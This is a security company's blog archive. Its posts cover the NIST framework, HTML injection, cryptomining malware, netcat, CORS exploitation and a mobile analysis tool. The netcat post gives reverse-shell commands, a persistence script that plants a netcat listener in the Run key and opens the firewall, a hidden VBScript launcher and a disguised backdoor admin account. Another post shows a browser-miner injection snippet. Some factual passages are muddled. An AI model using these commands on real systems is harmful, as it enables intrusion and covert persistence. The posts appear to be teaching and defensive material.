
Friday, 18 May 2018

NIST CYBERSECURITY FRAMEWORK 1.1

INTRODUCTION

The Framework 1.1 offers an agile way to address cybersecurity, including cybersecurity’s effect on physical, cyber, and people dimensions. It applies to organisations relying on technology, whether their cybersecurity focus is primarily on Information Technology (IT), Industrial Control Systems (ICS), Cyber-Physical Systems (CPS), or connected devices more generally, including the Internet of Things (IoT). The Framework 1.1 can help organisations address cybersecurity as it affects the privacy of other data. Additionally, the Framework 1.1’s outcomes serve as targets for workforce development and evolution activities.
The Framework 1.1 is not a one-size-fits-all method to manage cybersecurity risk for critical infrastructure. Organizations will continue to have static risks, with different threats, different vulnerabilities and different risk tolerances. They will also vary in how they customise the practices described in the Framework 1.1. Organizations can determine the activities that are important to critical service delivery and can prioritise investments to maximise the impact of each dollar spent. The Framework 1.1 aims to reduce risk and to manage cybersecurity threats better.
The Framework 1.1 is a living document and will continue to be updated and improved as the industry responds to implementation. NIST will continue coordinating with the private sector and government agencies at all levels. As the Framework 1.1 is put into greater practice, additional lessons learned will be integrated into future versions. This will ensure that the Framework 1.1 meets the needs of critical infrastructure owners and operators in an environment of new threats and new solutions.

USAGE OF FRAMEWORK 1.1

An organisation can use the Framework 1.1 as a critical part of its systematic process for identifying, assessing, and managing cybersecurity risk. The Framework is not meant to replace existing methods; a company can keep its current method and overlay it onto the Framework 1.1 to find gaps in its current cybersecurity risk approach. The Framework 1.1 can be used as a cybersecurity risk management tool: an organisation can identify the activities that are most central to critical service delivery and prioritise expenditures to maximise the impact of the investment.
It is designed to complement cybersecurity operations. It can serve as the foundation for a new cybersecurity program or as a mechanism for improving an existing one. The Framework 1.1 provides a means of articulating cybersecurity requirements to business partners and customers and can help identify gaps in an organisation’s cybersecurity practices.
The Framework 1.1 can be applied throughout the lifecycle phases: plan, design, build/buy, deploy, operate, and decommission. The planning phase begins the cycle of any system and lays the groundwork for everything that follows. Overarching cybersecurity considerations should be declared and described as clearly as possible. The plan should recognise that those requirements will evolve during the remainder of the life cycle.
CYBERSECURITY USAGE FRAMEWORK 1.1

CONCLUSION

The Cybersecurity Framework 1.1 is intended to reduce risk by improving the management of cyber security risk to organisational objectives. Ideally, organisations using the Framework 1.1 will be able to measure and assign values to their risk along with the cost and benefits of steps taken to decrease risk to proper levels. The better an organisation can estimate its risk, costs, and advantages of cybersecurity strategies and actions, the more rational, useful, and valuable its cybersecurity approach and investments will be.
Over time, self-assessment and measurement should improve decision making about investment priorities. For example, measuring – or at least robustly characterising – aspects of an organisation’s cybersecurity state and trends over time can enable that organisation to understand and convey meaningful risk information to dependents, suppliers, buyers, and other parties. An organisation can accomplish this internally or by seeking a third-party assessment. If done correctly and with an appreciation of limitations, these measurements can provide a basis for healthy trusted relationships, both inside and outside of an organisation.

REFERENCE:

https://www.nist.gov/cyberframework
https://www.us-cert.gov/ccubedvp/cybersecurity-framework

AUTHOR

Dharmesh B
Security Engineer
Briskinfosec Technology and Consulting Pvt Ltd.,
https://www.linkedin.com/in/dharmeshbaskaran/

Monday, 23 April 2018

HTML INJECTION ATTACK


INTRODUCTION:

HTML injection is an attack on web applications in which a user can insert HTML tags and attributes through a specific parameter; tags such as <h1>, </h1>, <td>, <tr> and <a href> are among the sources used to perform this HTML-based injection attack.
When these parameters are fed untrusted input, there is a high risk of XSS, specifically HTML injection. If the strings are not sanitised properly, the issue can lead to XSS-based HTML injection, which allows the attacker to modify the web content easily.

POSSIBLE ATTACK SCENARIO:

An HTML injection attack proceeds in the following steps:
  • First, the attacker finds the injection flaw and attempts an HTML injection attack.
  • The attacker crafts a malicious link containing the HTML injection payload and sends it to a client through an email.
  • The client visits the web page because it is located within a trusted domain.
  • The injected HTML code is rendered and presented to the client, requesting valid credentials such as username and password.
  • The client enters a username and password, which are both sent to the attacker’s server.
There are two types of HTML injection attack:
  • Stored HTML injection attack
  • Reflected HTML injection attack

STORED HTML INJECTION ATTACK

Stored HTML injection is also known as persistent injection (the payload is always stored in the backend database). The attacker submits the payload to the web server, where it is stored permanently, and the application server serves it to every user who visits the targeted website. Here I have given a sample HTML code for stored HTML injection.
When the client clicks the payload, they are redirected to the official part of the website, and the injected HTML code is executed by the browser.

REFLECTED HTML INJECTION

Reflected HTML injection is known as non-persistent injection (the payload is not stored in the backend database; it is reflected immediately). Whenever the backend server processes HTML input without proper sanitisation and validation, it leads to HTML injection in the web application.

Here I have given the input <h>you are hacked</h>, and it is reflected as ‘you are hacked “ class=” colourbox” title=” help me with page”>

MITIGATION FOR HTML INJECTION:

Here we use parameterised queries to block unwanted scripts, and special characters such as <, >, “, ‘, %, & and / are properly sanitised in the given input fields. The preferred choice is to use a safe API which avoids the use of the interpreter entirely or provides a parameterised interface. Be careful with APIs, such as stored procedures, that are parameterised.
If a parameterised API is not available, you should carefully escape special characters using the appropriate escape syntax for that interpreter.
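As an added example (not code from the original post), the escaping step the mitigation above refers to, applied to the three places the post mentions untrusted input landing: between tags, inside a quoted attribute, and in an href. The helper names are my own.

```javascript
// Added example, not from the original post: context-aware output encoding
// for reflected input. Helper names (escapeHtml, renderText, renderTitleAttr,
// safeHref, renderLink) are mine, not part of any framework.

// The five characters that let text change the markup around it.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode untrusted input so the browser shows it as literal text.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Text-node context: the reflected value sits between tags, so a raw <h>
// would otherwise become a real element.
function renderText(untrusted) {
  return `<p>${escapeHtml(untrusted)}</p>`;
}

// Attribute context: the value sits inside double quotes. An unescaped quote
// would close the attribute early and let the input add attributes of its own,
// which is the breakout the reflected output in the post shows.
function renderTitleAttr(untrusted) {
  return `<span class="colourbox" title="${escapeHtml(untrusted)}">help me with page</span>`;
}

// href context: escaping alone is not enough, because the browser still
// follows whatever scheme the value carries. Parse it and keep http(s) only.
function safeHref(untrusted) {
  let url;
  try {
    url = new URL(String(untrusted));
  } catch (e) {
    return '#';
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return '#';
  return escapeHtml(url.href);
}

// Link built from two untrusted values, each encoded for its own context.
function renderLink(untrustedHref, untrustedText) {
  return `<a href="${safeHref(untrustedHref)}">${escapeHtml(untrustedText)}</a>`;
}

// Constructed inputs taken from the post's own reflected example.
console.log(renderText('<h>you are hacked</h>'));
console.log(renderTitleAttr('you are hacked" class="colourbox'));
```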

CONCLUSION:

HTML injection is similar to cross-site scripting (XSS), which affects the client side. So HTML injection can be exploited in the same way as cross-site scripting, which includes adding HTML data to the web application, temporary defacement of the website, etc. Hence it is necessary to protect web applications from HTML injection.

AUTHOR

Aravindan S
Security Engineer
BriskinfoSec Technology and Consulting  Pvt Ltd.,
https://www.linkedin.com/in/aravindhan-s-90b98787/

Monday, 2 April 2018

CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY


Cryptocurrency is a kind of digital currency that is transferred across the internet, and by mining it people have started to earn money online.
In recent days many people have begun to make money through this process, in which a hash is calculated for every payment; compare the way that, when you transfer money online, a share of the transaction goes to the bank through which the capital moved.
Cryptocurrency mining captures the hash for each payment, and a share is passed to the person who mines it; each transaction extends the blockchain, and based on it new bitcoins get created.

CRYPTOCURRENCY MINING MALWARE INFECTED OVER HALF-MILLION PCS USING NSA EXPLOIT

Several cybersecurity firms are reporting new cryptocurrency mining malware that is being spread using the EternalBlue NSA exploit leaked by the Shadow Brokers hacking group.
Researchers from Proofpoint discovered a massive global botnet dubbed “Smominru” whose primary function is to use the EternalBlue SMB exploit (CVE-2017-0144) to infect Windows computers and secretly mine Monero cryptocurrency, worth millions of dollars, for its master.
In 2017, the Smominru botnet had already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows. According to the researchers, based on the hash power attributed to the Monero payment address, the botnet has grown to twice the size of regular botnets.
This botnet has already mined over 8,900 Monero, valued at about $3.6 million, at a rate of roughly 24 Monero per day; using it, the operators have compromised millions of computers, mainly in Russia, India and Taiwan.
Proofpoint researchers say that cybercriminals are using at least 25 machines to scan the internet for vulnerable Windows computers, and are also using the leaked NSA RDP protocol exploit EsteemAudit (CVE-2017-0176) for infection.
WannaMine is one of the recent EternalBlue-based miners; it infects computers to mine Monero, is hard for antivirus to detect, and has affected many companies for weeks or even months.
Attackers have also started to use cryptojacking: browser-based JavaScript code with which cryptocurrency miners use website visitors’ CPU power to mine cryptocurrencies for monetisation.

BROWSER-BASED CRYPTOCURRENCY MINING:

Browser-based cryptocurrency mining is mining performed through your browser. It is one of the oldest methods, launched in 2011; it works with scripts and differs from file-based cryptocurrency mining, which involves downloading and executing detectable files.
Bitcoin Plus is one of the methods to mine through the browser. We can generate a JavaScript snippet, and once it is injected into a web page, the page starts mining whenever a visitor signs up to it, and browser-based mining takes place. The mining JavaScript code is given below for your reference.
Example Script:
<script src="https://testphp.vulnweb.com/lib/testphp.min.js"></script>
<script>var miner = new cognitive.User('<site-key>', 'john-days'); Start();</script>
Once this code executes on your website, visitors’ browsers start to mine, which increases their CPU load, and by this method profit is easily made.

PREVENTION FROM BROWSER CRYPTOCURRENCY MINING:

Apart from ransomware, cryptocurrency mining malware plays a vital role in our daily life, and this mining is mainly used to mine through your website.
Most attackers use The Pirate Bay to consume visitors’ CPU processing; we can also monitor the CPU usage of the system and check whether any unknown website or mining website is running.
In this way we can detect many mining sites, and we also have several browser add-ons to identify mining websites, as follows:
  • Use the No Coin extension
  • Use the minerBlock Chrome extension
  • Block coin mining domains in the hosts file
  • Use NoScript in Firefox

HOW CRYPTOCURRENCY MINING ACHIEVED THROUGH RANSOMWARE:

Cryptocurrency mining can also be done using ransomware techniques. A new ransomware miner called Trojan-Ransom.Win32.Linkup is a new kind of ransomware: it does not encrypt your files, it just creates a mining robot on your system.
Linkup ransomware creates fake websites on your system; when a person uses them, they redirect to some other site, and through the add-ons on the fake site a share of the proceeds is credited to the miner.
This ransomware asks you to download some malware files, and once they are installed it automatically downloads bitcoin mining software.
When the victim runs the software, it makes the CPU run faster and consume more energy.
This further increases the electricity bill, and based on the energy consumed the crypto miners get their share.
Linkup ransomware differs from other malware such as CryptoLocker, which was ransomware that hit a US police department and demanded $800 in bitcoins; the virus is removed once the demanded amount is paid, which renders it more concerning than Linkup.

MOBILE CRYPTOCURRENCY MALWARE ATTACKS:

Cryptocurrency mining malware attacks have started to affect mobile devices by placing mining code in Android apps, and they affect most Android users who download legitimate-looking apps that are packed with code that “mines” for hackers without the user’s knowledge.
These attacks are already happening in North America and Russia; half of the cryptocurrency mining malware attacks are in Russia and 20 percent are in the US, and a recent spate of attackers have started sending fake phishing messages in Australia that try to convince the victim to download mining malware to their phones.
One example of mobile cryptocurrency mining malware that Symantec sent to Motherboard appeared to be a fully functioning crossword puzzle game app, but in the background it was mining cryptocurrencies. Running such apps may drain your battery and make your phone less responsive, so be careful before you start to use an unknown app.

OVERALL CRYPTOCURRENCY MINING USED BY THE ATTACKERS:

CONCLUSION:

Cryptocurrency mining attacks can spread in various ways: through botnets, through browser-based JavaScript mining code, and through malicious mobile apps. Through cryptocurrency mining many attackers have started to earn money, and you can check it through some bitcoin apps that are available on the internet.

AUTHOR

RamKumar G
Security Engineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

Friday, 23 March 2018

NETCAT

Netcat is a computer network utility used for gaining access and for sending and receiving files over the internet using TCP and UDP connections. This tool is very famous for debugging networks and for investigation purposes. Netcat is also known as NC or the Swiss army knife. It is one of the most critical tools for network admins, programmers and penetration testers.


NETCAT SETUP:

Setting up netcat on Windows is very simple. Download Netcat for Windows from the following link: https://joncraton.org/blog/46/netcat-for-windows/.
Once you have downloaded it, extract the file into the C: directory. Then open a command prompt and navigate to the netcat directory (yes, I know we are lazy; a shortcut to open a command prompt from the same directory is to go to the netcat directory, hold Shift, right-click, and you will see the option “Open command window here”). Now run nc.exe.
On Linux netcat is pre-installed, so we don’t need to worry about it. If you don’t find it on Linux, open the terminal and type “apt-get install netcat”. This command will install netcat for you.
In this blog I am using Kali Linux as my attacker machine and Windows 7 as the victim machine.

PENETRATION TESTING WITH NETCAT

Netcat has two primary modes of operation: one is as a client, and the other is as a server. These two modes are hackers’ favourites, and penetration testers also use them.
The primary usage of the two modes is connecting to somewhere and listening for inbound connections:
connect to somewhere: nc [-options] host-name port [s]   # this syntax is for netcat client mode
listen for inbound:   nc -l -p port [options] [host-name] [port]   # this syntax is for netcat server mode
The most commonly used options in netcat are:
-c shell commands   as `-e'; use /bin/sh to exec [dangerous!!]
-e filename         program to exec after connect [dangerous!!]
-l                  listen mode, for inbound connects
-n                  numeric-only IP addresses, no DNS
-p port             local port number
-u                  UDP mode
-v                  verbose [use twice to be more verbose]
-z                  zero-I/O mode [used for scanning]
Netcat’s most potent option is -e prog. It is used in server mode and allows netcat to execute a command on the remote system: when a client connects to the server, netcat runs the specified program.
nc -l -p 1234 -e cmd.exe    # windows
nc -l -p 1234 -e /bin/sh    # Linux
These are the basics of netcat. If you are still a beginner with netcat, read this article for a clear understanding: http://scitechconnect.elsevier.com/wp-content/uploads/2013/09/Introduction-to-Netcat.pdf
Let’s get into real-time penetration testing with netcat.
Let’s get a basic reverse shell from Windows 7:
nc -lvp 1234   # Kali Linux
nc.exe 192.168.0.151 1234 -e cmd.exe   # windows (IP mentioned is Kali IP address)
When the victim enters the command, I get a reverse shell in Kali.

POST EXPLOITATION WITH NETCAT

Post exploitation is the crucial phase of penetration testing, and the fun part too. So here is some of the fun we can have with netcat.
Once we get a reverse shell from the victim system, we need to do the following step: maintain the connection.
All attackers face a big problem, which is session expiration. So here are some commands to make the session persistent.
@echo off
xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:\Windows\System32\" -y
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow protocol=UDP localport=449
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow program="C:\windows\system32\nc.exe"
NOTE: these commands should be run as administrator
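From the defender’s side, an added example (not code from the original post) that flags the Run-key listener and the firewall openings described above when run over constructed Run-key values and netsh lines; the function names and the sample data are mine.

```javascript
// Added example, not from the original post: a small triage routine for the
// persistence pattern above (a netcat listener started from the Run key and
// firewall rules that let it in). Function names and samples are constructed.

// Names netcat commonly ships under on Windows.
const NETCAT_BINARIES = new Set(['nc.exe', 'nc64.exe', 'ncat.exe', 'netcat.exe']);

// Executable name from a command line, quoted or not, without its path.
function executableName(cmdline) {
  const m = cmdline.trim().match(/^"([^"]+)"|^(\S+)/);
  const path = m ? (m[1] || m[2]) : '';
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Inspect one Run-key value. A hit is netcat started in listen mode (-l/-L)
// and/or with a program bound to the connection (-e/-c). Returns null when the
// value is not a netcat listener, otherwise a finding with the port if given.
function inspectRunValue(name, cmdline) {
  const exe = executableName(cmdline);
  if (!NETCAT_BINARIES.has(exe)) return null;
  const lower = cmdline.toLowerCase();
  const args = lower.slice(lower.indexOf(exe) + exe.length);
  const listens = /(^|\s)-[a-z]*l/.test(args);
  const execs = /(^|\s)-[a-z]*[ec](\s|$)/.test(args);
  const portMatch = args.match(/-[a-z]*p\s*(\d+)/);
  if (!listens && !execs) return null;
  return { value: name, exe, listens, execs, port: portMatch ? Number(portMatch[1]) : null };
}

// Inspect one netsh line. Flag "add rule ... action=allow" lines that name a
// netcat binary or that open a port one of the flagged listeners uses.
function inspectFirewallRule(line, listenerPorts) {
  if (!/netsh\s+advfirewall\s+firewall\s+add\s+rule/i.test(line)) return null;
  if (!/action=allow/i.test(line)) return null;
  const program = (line.match(/program="?([^"\s]+)/i) || [])[1] || null;
  const portStr = (line.match(/localport=(\d+)/i) || [])[1];
  const port = portStr ? Number(portStr) : null;
  const allowsNetcat = program !== null && NETCAT_BINARIES.has(program.split(/[\\/]/).pop().toLowerCase());
  const opensListenerPort = port !== null && listenerPorts.has(port);
  if (!allowsNetcat && !opensListenerPort) return null;
  return { line, program, port, allowsNetcat, opensListenerPort };
}

// Correlate: listeners first, then firewall rules that serve them.
function triage(runValues, netshLines) {
  const listeners = Object.entries(runValues)
    .map(([name, cmd]) => inspectRunValue(name, cmd))
    .filter(Boolean);
  const ports = new Set(listeners.map((l) => l.port).filter((p) => p !== null));
  const firewallHoles = netshLines
    .map((line) => inspectFirewallRule(line, ports))
    .filter(Boolean);
  return { listeners, firewallHoles };
}

// Constructed sample data mirroring the post's commands plus a benign entry.
const SAMPLE_RUN_VALUES = {
  system: 'C:\\windows\\system32\\nc.exe -Ldp 449 -e cmd.exe',
  OneDrive: '"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
};
const SAMPLE_NETSH_LINES = [
  'netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow protocol=UDP localport=449',
  'netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow program="C:\\windows\\system32\\nc.exe"',
  'netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN',
];

console.log(JSON.stringify(triage(SAMPLE_RUN_VALUES, SAMPLE_NETSH_LINES), null, 2));
```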

RUNNING THE NETCAT IN BACKGROUND

Here is the VB script to run netcat in the background, so that you don’t have to wait for the user to restart their computer.
Dim objShell
Set objShell = Wscript.CreateObject("WScript.shell")
objShell.run "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Set objShell = Nothing
Play with the firewall
netsh advfirewall set allprofiles state off
– Turns the Windows firewall off (this will notify the user)
netsh advfirewall set allprofiles state on
– Turns the firewall on
netsh advfirewall reset
– Resets the firewall back to default
netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound
– Blocks everything
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN
– Adds a port rule
netsh advfirewall firewall delete rule name="HTTP"
– Deletes the rule
Schedule tasks
We can also mess with Windows scheduled tasks; we can create, delete and run a task.
Creating tasks
  – SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
Deleting tasks
  – SCHTASKS /Delete /TN "Backup and Restore"
Running tasks
  – SCHTASKS /Run /TN "StartBackup"
Now let’s create and add a local user and grant it administrator rights:
net user /add briskinfosec Netcat /comment:"Approved through 3/07/2018 per CTO" /fullname:"brisk info sec"
Netcat can also be used for scanning ports on the network.
nc -v 192.168.0.170 -z 1-1000   # ip = target ip

OUTPUT:

root@7h3pr0xy:~# nc -v  192.168.0.170 -z 1-1000
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
Sometimes we also need to randomise the port order against the target so as not to alert the IDS (intrusion detection system) or IPS (intrusion prevention system).
nc -v -r 192.168.0.170 -z 1-1000

OUTPUT:

root@7h3pr0xy:~# nc -v -r 192.168.0.170 -z 1-1000
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
While performing penetration testing, too little information will not help us move forward, so we look for more details. Netcat has a verbose option which gives more info about the target.
nc -vv -r 192.168.0.170 -z 130-140

OUTPUT:

root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
(UNKNOWN) [192.168.0.170] 130 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 134 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 133 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 140 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 132 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused
(UNKNOWN) [192.168.0.170] 138 (netbios-dgm) : Connection refused
(UNKNOWN) [192.168.0.170] 136 (?) : Connection refused
 sent 0, rcvd 0
Netcat can be used for offensive as well as defensive purposes. If you are good at programming, you can automate the execution process.
NOTE: use this Swiss army knife in a useful way, so no one gets hurt by its sharp edge.
Play safe and be safe.

AUTHOR

Venkatesh C.S
Security Engineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

Monday, 29 January 2018

HOW CAN INSECURE CORS LEAD TO A BIGGEST SECURITY THREAT FOR YOUR APPLICATION?

WHAT IS THE MEANING OF AN ORIGIN?

Two websites are said to have the same origin if both have the following in common:
  • Scheme (http, https)
  • Host name (google.com, facebook.com, briskinfosec.com)
  • Port number (80, 4657, 7777)
So, sites http://example.com and http://example.com/settings have same origin. But https://example.com:4657 and http://example.com:8080/settings have different origins.
The ‘Same Origin Policy’ restricts how a script loaded from one origin can interact with a resource from another origin. It is an important built-in security mechanism for browsers for isolating potential malicious scripts.

WHAT IS CROSS ORIGIN RESOURCE SHARING?

Web 2.0 needs to share resources across origins. Following are some examples:
  • Cross Origin Writes: A website can POST data to an endpoint of another website.
  • Cross Origin Embedding: A website can reference images from another website using the <img src> tag. Also, an iframe using the <iframe src> tag can be embedded if the source website allows it.
Apart from the above two scenarios, when one website reads data from another website, it is called ‘Cross Origin Resource Sharing’, aka CORS.
CORS is a W3C specification that allows cross-domain communication from the browser. It works by adding new HTTP headers that describe the origins that are allowed cross-domain information sharing.
In other words, CORS is used to relax the ‘Same Origin Policy’ for legitimate and trusted requests. It is an essential feature of Web 2.0 that lets APIs exposed via web services be accessible.
Some noteworthy examples of web applications supporting CORS: Google, YouTube, Flickr.

TWO MOST IMPORTANT CORS HEADERS:

  • Origin: It is set by the browser in every CORS request. Its value is the domain name from which the request originates.
  • Access-Control-Allow-Origin: It is set by the server in every CORS response. Depending on its value, the browser decides whether the response is allowed or not. It can be set to * (also called the wildcard character) to make resources public (however, this is not good practice).

PRE-FLIGHT REQUEST

A pre-flight request is just a normal HTTP request that happens before the actual cross-domain communication. The logic behind this is to ensure the client and server are fully compatible (protocol, security, and so on) with each other before the data is actually exchanged. If they are not, then the relevant error is raised.
Please keep in mind that a pre-flight request only triggers if:
  • Custom HTTP headers are sent
  • The body MIME type is different from text/plain
  • The HTTP method is different from GET or POST
The following is a typical pre-flight request-response pair:
Request:
   OPTIONS / HTTP/1.1
   Origin: http://api.user.com
   Access-Control-Request-Method: PUT
   Host: api.example.com
   Accept-Language: en-US
   Connection: keep-alive
   User-Agent: Browser
Response:
   HTTP/1.1 204 No Content
   Access-Control-Allow-Origin: http://api.user.com
   Access-Control-Allow-Methods: GET, POST, PUT
   Content-Type: text/html; charset=utf-8

SIMPLE REQUEST

A simple CORS request is similar to a pre-flight request without the initial capability exchange sequence occurring. In a typical simple CORS request, the following sequence happens:
Request: http://example.com  – Origin A
Response: http://cdn.briskinfosec.com – Origin B
  1. Origin A attempts to access the home page of a CDN running at origin B, http://cdn.briskinfosec.com, using CORS.
  2. Origin A sends a GET request to the Origin B web server.
  3. The Origin B server responds with Access-Control-Allow-Origin.

A SCENARIO TO EXPLOIT CORS VULNERABILITY:

In this demo we are going to use a vulnerable intranet application which has a secret located at ‘secret-cors-3.php’. It has an Admin who accesses it from his local environment. Its URL is: http://127.0.0.1:80/bwapp/.
As it is an intranet application, the attacker cannot interact with it remotely. Our goal as an attacker will be to capture the secret (from a remote internet location) by exploiting CORS vulnerability.

THE EXPLOITATION:

  • The attacker hosts a website containing the malicious script for cross-domain interaction.
  • The victim, i.e. the Admin of the intranet website, visits the attacker’s website at http://127.0.0.1:4567.
  • A response is received from the attacker’s website containing the following malicious payload:
  • As soon as the web page is loaded, the ‘makeRequest’ method is called. The method initiates a cross-domain request to the vulnerable intranet application at ‘http://127.0.0.1:80/bwapp/secret-cors-1.php’ to capture the secret.
  • It fetches the response and stores it in the variable ‘secret’.
  • ‘Access-Control-Allow-Origin’ is set to *. So the malicious script now has the secret, and it simply issues a GET request to the attacker’s web server; the attacker hosts another web server at http://127.0.0.1:7777.
  • Meanwhile, the attacker monitors the logs of that web server. The payload executes and the logs receive the secret.

HOW TO MITIGATE IT?

  • ‘Access-Control-Allow-Origin’ should never be set to * if the resource contains sensitive information.
  • The mitigation is simple and is just proper configuration. Configure the Access-Control-Allow-Origin header to allow requests only from the domains that you trust, for example: Access-Control-Allow-Origin: Saurabh.com. The image below illustrates that the CORS attack does NOT get executed when the server is configured with a correct ‘Access-Control-Allow-Origin’ instead of the wildcard character.
  • Make sure that the server-side validation of the Origin header value compares against the absolute value and NOT against a regular expression.
  • For example, the following code does a comparison with a regular expression:
RegEx("^https://mail.example.com$")
In the above validation, dots (.) match any character. So an attacker can bypass it by making the CORS request originate from the following domain: https://mailxexample.com
The patched code will be:
if ($_SERVER["HTTP_ORIGIN"] == "https://mail.example.com") {
    header("Access-Control-Allow-Origin: https://mail.example.com");
}
  • Clients should not trust received content without sanitisation, because that could result in client-side code execution. For example, if website abc.com trusts and fetches cross-domain data from example.com, and example.com has malicious intent and starts serving malicious JavaScript to abc.com, then abc.com can protect its users from cross-site scripting by sanitising the received data before presenting it to its users.
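The regex pitfall and the allowlist fix above, worked through as an added example (not the post’s own code, which is PHP), together with the headers a server should return for a simple and a pre-flight request. The allowlist, the permitted methods and the request headers are constructed for the example; the header names are the standard CORS ones.

```javascript
// Added example, not from the original post: the weak regex origin check next
// to a strict allowlist check, and the CORS response headers built from it.
// ALLOWED_ORIGINS, ALLOWED_METHODS and the sample requests are constructed.

const ALLOWED_ORIGINS = new Set(['https://mail.example.com', 'https://app.example.com']);
const ALLOWED_METHODS = new Set(['GET', 'POST', 'PUT']);

// The weak check from the post: an unescaped '.' matches any character, so a
// look-alike host such as mailxexample.com passes as well.
function weakOriginCheck(origin) {
  return /^https:\/\/mail.example.com$/.test(origin);
}

// Strict check: whole-string match against the allowlist, no patterns.
function isAllowedOrigin(origin) {
  return typeof origin === 'string' && ALLOWED_ORIGINS.has(origin);
}

// Headers for a simple request. A missing or untrusted Origin gets no CORS
// headers at all, so the browser refuses to hand the response to the page.
// "Vary: Origin" stops a shared cache replaying one origin's answer to another.
function corsHeadersFor(requestHeaders) {
  const origin = requestHeaders['origin'];
  if (!isAllowedOrigin(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Answer a pre-flight OPTIONS request: 204 with the allow headers when both
// the origin and the requested method are permitted, otherwise 403 with none.
function preflightResponse(requestHeaders) {
  const base = corsHeadersFor(requestHeaders);
  const method = requestHeaders['access-control-request-method'];
  if (!('Access-Control-Allow-Origin' in base) || !ALLOWED_METHODS.has(method)) {
    return { status: 403, headers: {} };
  }
  return {
    status: 204,
    headers: {
      ...base,
      'Access-Control-Allow-Methods': [...ALLOWED_METHODS].join(', '),
      'Access-Control-Max-Age': '600',
    },
  };
}

// Constructed requests: the trusted origin and the look-alike from the post.
console.log('weak check, look-alike:', weakOriginCheck('https://mailxexample.com'));
console.log('strict check, look-alike:', isAllowedOrigin('https://mailxexample.com'));
console.log(preflightResponse({ origin: 'https://mail.example.com', 'access-control-request-method': 'PUT' }));
```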

WHAT IF THE ORIGIN HEADER IS SPOOFED?

The point of the Origin header is not to protect the resources on the server; that task is up to the server itself. The Origin header is there to protect the user. The following scenario demonstrates it:
  • An attacker, Charlie, creates a malicious website M.
  • User Alice is tricked into visiting website M, which tries to perform a CORS action on server example.com, which supports it.
  • The domain example.com will be listed in website M’s list of allowed domains. So, the request will be rejected.
  • The important point here is that M cannot spoof the Origin header, because the request is initiated from Alice’s browser.
  • This could be done by Alice using a local proxy tool. But why would a victim hack himself? So this scenario is not realistic.
Another way an attacker can do this is by intercepting the request as a man in the middle. But if the attacker has access to the traffic, then capturing cookies and session IDs are better options than changing the Origin header.

OWASP CATEGORY FOR CORS VULNERABILITY:

This vulnerability falls under the category ‘Security Misconfiguration’ of the OWASP Top 10. The HTTP response header ‘Access-Control-Allow-Origin’ is not configured correctly, and this creates the issue.

CONCLUSION:

We have discussed what CORS is and how to exploit a CORS vulnerability in a web application and in API web services. It is important to verify that CORS is configured properly. As a part of web application security we need to make sure the shared resources are secure and the HTTP headers have not been tampered with. CORS exploitation can have serious consequences, letting sensitive data be compromised.
BriskInfosec provides the best web application and API security test.  Discover the reason to conduct Application Security test with us.
Reach us – Contact@briskinfosec.com
Author
RadhaKrishnan
Security Engineer
BriskInfosec Technology and Consulting PVT LTD
https://www.linkedin.com/in/radhakrishnan-r-209607111/

Wednesday, 3 January 2018

YSO – OPENSOURCE MOBILE SECURITY FRAMEWORK

YSO is a Mobile Security Framework capable of performing static and dynamic analysis on mobile applications. It supports only APK (Android) and IPA (iOS) files. Various tools are normally used to decompile, debug and review code in mobile app testing, which consumes a lot of time; with this framework we can check for various mobile issues such as:
  • Insecure Data Storage
  • Insecure Communication
  • Insecure Authentication
  • Certificate Pinning
  • Backup Data Enabled, etc.
The above issues are the major mobile issues that commonly occur.
Static analysis is used for automated code review and to detect insecure permissions, configuration issues, and insecure code such as SSL overriding, SSL bypass, weak crypto, obfuscated code, improper permissions, hard-coded secrets, improper usage of dangerous APIs, and leakage of sensitive/PII information.
